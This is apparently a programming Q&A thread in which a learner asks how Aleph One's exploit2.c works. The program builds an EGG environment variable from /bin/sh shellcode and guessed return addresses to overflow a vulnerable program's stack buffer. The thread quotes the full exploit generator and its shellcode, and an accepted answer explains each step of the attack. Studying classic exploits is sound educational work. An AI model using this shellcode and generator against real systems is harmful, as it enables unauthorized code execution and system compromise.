# Understanding Aleph one's overflow using environment variable

Tags: c, assembly, buffer-overflow

I'm reading "Smashing The Stack For Fun And Profit", and reached the first example of overflow using an environment variable:

```
exploit2.c
------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr += 4;
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
------------------------------------------------------------------------------

   Now we can try to guess what the buffer and offset should be...
```

Now, I understand the overall theory of setting an environment variable of the form "NAME=VALUE",
and as we can see in the code above it is EGG=OUR_SHELL_CODE.

But I'm not sure of where/when does the overflowing occurs... does main's return address is being overwritten? wish addr? what's with the offset? What address are we trying to reach?

Why are we looking for the address of the stack pointer? I mean using malloc() will allocate memory on the **heap**, so why do we need the address of the end of the **stack** (using get_sp())?
In addition, overflowing a buffer in the heap won't overwrite the return address..

Why are we writing "system("/bin/bash");"? (we already have bin/sh in the shellcode)
Is it the way to somehow load/execute the environment variable?

**Please fill in all the gaps for me (as thorough as possible) on the steps of this exploit.**
Thank you very much! :-)

Comment: What should this behaving like? what it is exploiting? I don't even get why `void main(int argc, char *argv[])` is a valid main construct.

Comment: also, why get_sp doesn't even need a return ?

Comment: Unless I'm mistaken, `get_sp()` will also return different values, depending on whether it's inlined or has the frame pointer optimized out. Apart form that, it  should *probably* return a `uintptr_t` rather than `unsigned long`. And, as @Zaibis points out, explicitly return...

Answer (score 2, accepted):

This is a helper program that will create the exploit. This isn't the vulnerable program, that one is aptly named `vulnerable`.

This program builds an `EGG` environment variable using heap memory which contains an exploit created based on the arguments specified. It assumes that the stack pointer of the vulnerable program will be somewhat similar to the current program's. The `offset` is used to cancel any differences. The exploit will have size `bsize` and it will contain the shell code itself, followed by copies of the guessed address for the start of the shellcode. This trailing portion will hopefully overwrite the return address **in the vulnerable program** and thus transfer control to the payload.

After the `EGG` has been created, the program spawns a shell for you so that you can start the vulnerable program. You can see in the original article that the vulnerable program is launched by `./vulnerable $EGG`.

This exploit generator isn't terribly good code, but that's a different matter.